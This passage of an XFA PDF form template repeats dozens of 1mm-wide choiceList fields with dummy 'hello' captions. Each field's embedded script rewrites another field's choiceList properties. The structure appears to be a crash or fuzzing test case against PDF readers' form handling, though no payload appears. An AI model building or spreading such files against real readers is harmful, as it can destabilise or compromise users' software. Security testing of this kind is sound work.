							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field36" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field37" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field38" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field39" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field40" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field41" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field42" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field43" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field44" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field45" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field46" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field47" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field48" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field49" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field50" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field51" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field52" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field53" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field54" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field55" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field56" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
…